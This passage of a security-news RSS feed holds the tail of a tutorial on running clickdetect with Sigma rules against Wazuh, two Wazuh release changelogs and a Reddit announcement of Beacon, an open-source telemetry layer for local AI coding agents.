teams_alert</pre><h3>Running</h3><p>Now you can run with docker.</p><pre>docker run -v ./runner.yml:/app/runner.yml -v ./rules/:/app/rules/ ghcr.io/clicksiem/clickdetect:latest</pre><h3>Results</h3><p>Running the clickdetect</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*OCvCAIuSWKvzEbGT.png"><figcaption>running</figcaption></figure><p>Clickdetect starts up, loads the rule from rules/, and schedules the detector to run every 5 minutes.</p><p><em>Results in terminal</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*JsqrThTwPPi2ZhII.png"><figcaption>Raw results in terminal</figcaption></figure><p>The terminal output shows the rule matched at least one event. Each match includes the rule name, level, and the raw document returned by the PPL query.</p><p><em>Results in teams</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*Da0BuOHe3xHXXmeF.png"><figcaption>teams result</figcaption></figure><p>The Teams webhook delivers the alert card with the rule name, severity level, and a summary of the matched events.</p><h3>Going further</h3><p>This is an extra to you understand the potential.</p><h3>Sigma rules</h3><p>You can use sigma rules with clickdetect, check out the documentation. <a href="https://clickdetect.souzo.me/sigma/">https://clickdetect.souzo.me/sigma/</a></p><h3>Configure rule</h3><blockquote><strong>WARNING</strong><em>: opensearch PPL sigma backend I’ts aligned with the latest opensearch version, “</em><strong>earliest</strong><em>” and “ </em><strong>latest</strong><em>” I’ts not recorinized in wazuh indexer 2.19</em></blockquote><p>Let’s create the sigma rule directory and save the sigma rule.</p><pre>mkdir -p rules/sigma/</pre><p>Save your rule inside the created directory.</p><pre>cat &lt;&lt; EOF &gt; rules/sigma/manager_started.yml<br>title: "wazuh opensearch sigma test - Manager Started"<br>status: test<br>id: 32bc608c-67ab-4d58-8361-35d3baac726c<br>logsource:<br>    product: wazuh<br>    category: indexer<br>detection:<br>    sel:<br>        rule.id: '502'<br>    condition: 1 of sel<br>custom:<br>    opensearch_ppl_min_time: "-5m"<br>    opensearch_ppl_max_time: "now"<br>EOF</pre><h3>Configure runner</h3><p>Change the directory of rule in you runner</p><pre>cat &lt;&lt; EOF &gt; runner.yml<br>datasource:<br>    type: opensearch-ppl<br>    url: https://127.0.0.1:9200<br>    username: wazuh<br>    password: wazuh-adm<br>    verify: false<br><br>webhooks:<br>    teams_alert:<br>        type: teams<br>        url: https://&lt;your_companie&gt;.webhook.office.com/...<br>        timeout: 10<br>        verify: false<br><br>detectors:<br>    my_sigma_detector:<br>        name: "5m interval"<br>        for: "5m"<br>        description: "detect sigma rule with 5 min interval"<br>        rules:<br>            - "/app/rules/sigma/*"<br>        sigma: true<br>        webhooks:<br>            - teams_alert</pre><h3>Run</h3><p>Now you can run.</p><pre>docker run -v ./runner.yml:/app/runner.yml -v ./rules/:/app/rules/ ghcr.io/clicksiem/clickdetect:latest</pre><h3>AI</h3><p>Clickdetect + AI SOC Agent. You can specify an AI to auto analyze and generate score using clickdetect agentic plugin.</p><p><em>Example with deepseek</em>.</p><pre>plugins: <br>    clickagentic:<br>        provider: 'deepseek'<br>        model: 'deepseek-chat'<br>        token: '&lt;token&gt;'</pre><h3>Results</h3><p>This is the result of clickagentic with teams webhook.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/630/0*vxLMdT6mjyc5Q03Q.png"></figure><p>Check out the documentation: <a href="https://clickdetect.souzo.me/plugin/clickagentic/">https://clickdetect.souzo.me/plugin/clickagentic/</a></p><h3><strong>Conclusion</strong></h3><p>With this blog post now you can:</p><ul><li>Run Sigma rules inside your wazuh environment</li><li>Perform multi tenant search and cross site search</li><li>Perform correlation between different logs sources</li><li>Improve your SOC team.</li></ul><p>Clickdetect is not affiliated to ClickHouse, and I’m not sponsored (yet).</p><p>If this post helped you, consider giving <a href="https://github.com/clicksiem/clickdetect">clickdetect a star on GitHub</a> — it helps the project reach more security teams. ✨</p><p>Follow my social:</p><ul><li><em>E-mail</em>: safeup@souzo.me</li><li><em>Matrix</em>: @souzo:matrix.org</li><li><em>Twitter/X</em>: <a href="https://x.com/souzomain">https://x.com/souzomain</a></li><li><em>Linkedin</em>: <a href="https://www.linkedin.com/in/vinicius-m-a76ba51b5/">https://www.linkedin.com/in/vinicius-m-a76ba51b5/</a></li><li><em>Reddit</em>: <a href="https://www.reddit.com/user/_souzo/">https://www.reddit.com/user/_souzo/</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=3a52e706cac5" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/extending-wazuh-detection-capabilities-with-clickdetect-opensearch-ppl-and-sigma-rules-3a52e706cac5">Extending Wazuh detection capabilities with clickdetect, Opensearch PPL and Sigma Rules</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v4.14.6-rc1]]></title>
<description><![CDATA[Manager
Removed

Removed unused SSL/TLS transport option from cluster. (#35648)

Fixed

Improved message decompression handling in remoted. (#35773)
Improved agent name validation to reject names starting with dot. (#35833)
Fixed segfault in vulnerability scanner module shutdown when disabled. (#...]]></description>
<link>https://tsecurity.de/de/3553772/it-security-tools/wazuh-v4146-rc1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3553772/it-security-tools/wazuh-v4146-rc1/</guid>
<pubDate>Thu, 28 May 2026 12:34:14 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Manager</h3>
<h4>Removed</h4>
<ul>
<li>Removed unused SSL/TLS transport option from cluster. (<a href="https://github.com/wazuh/wazuh/pull/35648" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35648/hovercard">#35648</a>)</li>
</ul>
<h4>Fixed</h4>
<ul>
<li>Improved message decompression handling in remoted. (<a href="https://github.com/wazuh/wazuh/pull/35773" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35773/hovercard">#35773</a>)</li>
<li>Improved agent name validation to reject names starting with dot. (<a href="https://github.com/wazuh/wazuh/pull/35833" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35833/hovercard">#35833</a>)</li>
<li>Fixed segfault in vulnerability scanner module shutdown when disabled. (<a href="https://github.com/wazuh/wazuh/pull/36011" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36011/hovercard">#36011</a>)</li>
<li>Fixed string buffer handling in version comparison function. (<a href="https://github.com/wazuh/wazuh/pull/36059" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36059/hovercard">#36059</a>)</li>
<li>Improved cluster file synchronization security. (<a href="https://github.com/wazuh/wazuh/pull/36060" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36060/hovercard">#36060</a>)</li>
<li>Improved cluster file synchronization error handling on invalid task identifiers. (<a href="https://github.com/wazuh/wazuh/pull/36129" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36129/hovercard">#36129</a>)</li>
<li>Improved cluster merged file parameter validation to prevent directory escape. (<a href="https://github.com/wazuh/wazuh/pull/36204" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36204/hovercard">#36204</a>)</li>
<li>Improved <code>tmp_file</code> path validation in cluster DAPI. (<a href="https://github.com/wazuh/wazuh/pull/36246" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36246/hovercard">#36246</a>)</li>
<li>Improved cluster non-merged file path validation during worker file processing. (<a href="https://github.com/wazuh/wazuh/pull/36296" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36296/hovercard">#36296</a>)</li>
<li>Improved cluster node name format validation in the hello handler. (<a href="https://github.com/wazuh/wazuh/pull/36460" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36460/hovercard">#36460</a>)</li>
<li>Fixed missing <code>agent.host.ip</code> in inventory documents when agent IP is empty. (<a href="https://github.com/wazuh/wazuh/pull/35475" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35475/hovercard">#35475</a>)</li>
<li>Fixed stale agent <code>synced</code> status after hot reload on cluster worker nodes. (<a href="https://github.com/wazuh/external-devel-requests/issues/6726" data-hovercard-type="issue" data-hovercard-url="/wazuh/external-devel-requests/issues/6726/hovercard">#6726</a>)</li>
</ul>
<h3>Agent</h3>
<h4>Fixed</h4>
<ul>
<li>Fixed agent registration not running on reinstall after <code>apt-get remove</code>. (<a href="https://github.com/wazuh/wazuh/pull/35727" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35727/hovercard">#35727</a>)</li>
<li>Fixed MS-Graph integration handling for relationships containing <code>/</code>. (<a href="https://github.com/wazuh/wazuh/pull/35431" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35431/hovercard">#35431</a>)</li>
<li>Fixed macOS syscollector to skip package receipts whose payload is no longer installed. (<a href="https://github.com/wazuh/wazuh/pull/35380" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35380/hovercard">#35380</a>)</li>
<li>Fixed missing eBPF create, modify and delete events on Ubuntu 24/26 and improved FIM whodata healthcheck. (<a href="https://github.com/wazuh/wazuh/pull/35838" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35838/hovercard">#35838</a>)</li>
<li>Hardened FIM database path lookups by migrating to parameterized SQL queries. (<a href="https://github.com/wazuh/wazuh/pull/36399" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36399/hovercard">#36399</a>)</li>
</ul>
<h3>RESTful API</h3>
<h4>Fixed</h4>
<ul>
<li>Escaped control characters in API usernames in access logs. (<a href="https://github.com/wazuh/wazuh/pull/35866" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35866/hovercard">#35866</a>)</li>
<li>Added input validation in cluster result handling and authentication. (<a href="https://github.com/wazuh/wazuh/pull/35757" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35757/hovercard">#35757</a>)</li>
<li>Fixed current user resolution in the <code>update-user</code> endpoint to enforce admin protection. (<a href="https://github.com/wazuh/wazuh/pull/35442" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35442/hovercard">#35442</a>)</li>
</ul>
<h3>Ruleset</h3>
<h4>Fixed</h4>
<ul>
<li>Updated rootcheck trojan signatures to avoid false positives on modern distributions (Debian 13, Ubuntu 26, Arch Linux). (<a href="https://github.com/wazuh/wazuh/pull/35927" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35927/hovercard">#35927</a>)</li>
</ul>
<h3>Other</h3>
<h4>Changed</h4>
<ul>
<li>Updated <code>cryptography</code>, <code>urllib3</code> and <code>python-multipart</code> Python dependencies. (<a href="https://github.com/wazuh/wazuh/pull/35982" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35982/hovercard">#35982</a>)</li>
<li>Updated eBPF libraries: <code>libbpf</code> to 1.7.0 and <code>bpftool</code> to 7.7.0. (<a href="https://github.com/wazuh/wazuh/pull/36467" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36467/hovercard">#36467</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[We built the open-source layer for local AI agent visibility]]></title>
<description><![CDATA[Observation: AI security is moving from the model gateway to the endpoint. Problem: When AI tools mostly answered questions, gateways could inspect prompts, outputs, and model access. But local AI agents are different: they run locally, inherit user permissions, read repos, execute commands, call...]]></description>
<link>https://tsecurity.de/de/3546504/it-security-nachrichten/we-built-the-open-source-layer-for-local-ai-agent-visibility/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546504/it-security-nachrichten/we-built-the-open-source-layer-for-local-ai-agent-visibility/</guid>
<pubDate>Tue, 26 May 2026 00:37:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><strong>Observation:</strong> AI security is moving from the model gateway to the endpoint.</p> <p><strong>Problem:</strong><br> When AI tools mostly answered questions, gateways could inspect prompts, outputs, and model access. But local AI agents are different: they run locally, inherit user permissions, read repos, execute commands, call tools, use credentials, and change files.<br> That creates a new visibility gap for security &amp; IT teams: they can often see the effects of agent activity, but <em>not the workflow behind it</em>.</p> <p><strong>Solution:</strong><br> Beacon is an open-source endpoint telemetry layer for local AI coding agents. Beacon helps teams bring local AI agent activity into existing endpoint, investigation, and SIEM workflows.</p> <ul> <li><strong>Supported agents:</strong> Claude Code, Codex CLI, OpenCode, Factory Droid, Cursor, Claude Cowork.</li> <li><strong>SIEM/forwarding:</strong> Wazuh, Splunk HEC, or customer-managed SIEM pipelines.</li> <li><strong>MDM/deployment:</strong> Jamf Pro, Fleet, or another macOS MDM.</li> </ul> <p>Our vision with Beacon is to be the open source layer for local agent visibility in the enterprise.</p> <p><strong>Feedback:</strong><br> Our team would love your feedback. If you’re a security or IT leader thinking about how to safely roll out AI coding agents: <strong>What would Beacon need to support for you to adopt something like this internally?</strong></p> <ul> <li>More MDM compatibility?</li> <li>More SIEM destinations?</li> <li>Support for more agent runtimes?</li> </ul> <p>If this problem feels real, a GitHub star would also help us get the project in front of more security teams. Github link is in the substack.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/thegodhimself119"> /u/thegodhimself119 </a> <br> <span><a href="https://www.reddit.com/r/security/comments/1tgvtm3/we_built_the_opensource_layer_for_local_ai_agent/">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/1tgvtm3/we_built_the_opensource_layer_for_local_ai_agent/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v5.0.0 Beta 2]]></title>
<description><![CDATA[What's Changed

Coding style clang format by @jotacarma90 in #35051
Dovecot decoders don't match correctly by @hossam1522 in #35089
Fixing CIS 35675 and 35689 rules bug by @hossam1522 in #35088
Improve buffer handling in regex match processing by @vikman90 in #35106
Fix empty-message failure in W...]]></description>
<link>https://tsecurity.de/de/3536717/it-security-tools/wazuh-v500-beta-2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536717/it-security-tools/wazuh-v500-beta-2/</guid>
<pubDate>Thu, 21 May 2026 16:21:36 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Coding style clang format by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4100656801" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35051" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35051/hovercard" href="https://github.com/wazuh/wazuh/pull/35051">#35051</a></li>
<li>Dovecot decoders don't match correctly by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hossam1522/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hossam1522">@hossam1522</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4119628979" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35089" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35089/hovercard" href="https://github.com/wazuh/wazuh/pull/35089">#35089</a></li>
<li>Fixing CIS 35675 and 35689 rules bug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hossam1522/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hossam1522">@hossam1522</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4119588292" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35088" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35088/hovercard" href="https://github.com/wazuh/wazuh/pull/35088">#35088</a></li>
<li>Improve buffer handling in regex match processing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4129178048" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35106" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35106/hovercard" href="https://github.com/wazuh/wazuh/pull/35106">#35106</a></li>
<li>Fix empty-message failure in Windows enrollment integration test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4109323061" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35078" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35078/hovercard" href="https://github.com/wazuh/wazuh/pull/35078">#35078</a></li>
<li>Use daily marker for GuardDuty log collector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131022761" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35110" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35110/hovercard" href="https://github.com/wazuh/wazuh/pull/35110">#35110</a></li>
<li>Fix rate limit handling for /events endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/javiersanchz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/javiersanchz">@javiersanchz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108679940" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35077" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35077/hovercard" href="https://github.com/wazuh/wazuh/pull/35077">#35077</a></li>
<li>Upload Size Limit Config Mismatch - Implementation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jnasselle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jnasselle">@jnasselle</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144935759" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35141" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35141/hovercard" href="https://github.com/wazuh/wazuh/pull/35141">#35141</a></li>
<li>Update embedded Python and dependencies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/javiersanchz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/javiersanchz">@javiersanchz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4143355910" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35135" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35135/hovercard" href="https://github.com/wazuh/wazuh/pull/35135">#35135</a></li>
<li>Escape document id in delete bulk operations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4168723202" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35174" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35174/hovercard" href="https://github.com/wazuh/wazuh/pull/35174">#35174</a></li>
<li>Add length validation after decompression in ReadSecMSG by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MiguelazoDS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MiguelazoDS">@MiguelazoDS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174203801" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35193" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35193/hovercard" href="https://github.com/wazuh/wazuh/pull/35193">#35193</a></li>
<li>Fix uncontroller memory allocation in cluster by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FrancoRivero2025/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FrancoRivero2025">@FrancoRivero2025</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4157622393" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35173" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35173/hovercard" href="https://github.com/wazuh/wazuh/pull/35173">#35173</a></li>
<li>Limit nested JSON depth in API requests - Implementation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jnasselle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jnasselle">@jnasselle</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181332316" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35224" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35224/hovercard" href="https://github.com/wazuh/wazuh/pull/35224">#35224</a></li>
<li>Fix clang-format version resolution in CI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4171147358" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35180" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35180/hovercard" href="https://github.com/wazuh/wazuh/pull/35180">#35180</a></li>
<li>Align plugin decoder arguments with existing call path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matigarciadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matigarciadev">@matigarciadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4169835469" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35176" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35176/hovercard" href="https://github.com/wazuh/wazuh/pull/35176">#35176</a></li>
<li>Add groups path validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4182653833" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35230" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35230/hovercard" href="https://github.com/wazuh/wazuh/pull/35230">#35230</a></li>
<li>Fix audit log cache overflow for events with many records by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217374538" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35285" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35285/hovercard" href="https://github.com/wazuh/wazuh/pull/35285">#35285</a></li>
<li>Update dependencies: cryptography, requests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/javiersanchz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/javiersanchz">@javiersanchz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225608568" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35331" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35331/hovercard" href="https://github.com/wazuh/wazuh/pull/35331">#35331</a></li>
<li>Fix memory allocation for long registry paths in syscheck by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217521486" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35287" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35287/hovercard" href="https://github.com/wazuh/wazuh/pull/35287">#35287</a></li>
<li>Fix for rootcheck not generating findings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218701173" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35297" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35297/hovercard" href="https://github.com/wazuh/wazuh/pull/35297">#35297</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4238432834" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35379" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35379/hovercard" href="https://github.com/wazuh/wazuh/pull/35379">#35379</a></li>
<li>Fix coverity findings in group validation paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241604123" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35384" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35384/hovercard" href="https://github.com/wazuh/wazuh/pull/35384">#35384</a></li>
<li>Fix active config endpoint and Integration tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FrancoRivero2025/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FrancoRivero2025">@FrancoRivero2025</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254596456" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35412" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35412/hovercard" href="https://github.com/wazuh/wazuh/pull/35412">#35412</a></li>
<li>Server integration tests flaky test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230921793" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35353" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35353/hovercard" href="https://github.com/wazuh/wazuh/pull/35353">#35353</a></li>
<li>Skip macOS receipts that are no longer installed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4239166810" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35380" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35380/hovercard" href="https://github.com/wazuh/wazuh/pull/35380">#35380</a></li>
<li>Revert tag references to main after v5.0.0-beta1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268956178" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35447" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35447/hovercard" href="https://github.com/wazuh/wazuh/pull/35447">#35447</a></li>
<li>Improve the code to hide information when a user doesn't have permission by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FrancoRivero2025/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FrancoRivero2025">@FrancoRivero2025</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4220169532" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35307" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35307/hovercard" href="https://github.com/wazuh/wazuh/pull/35307">#35307</a></li>
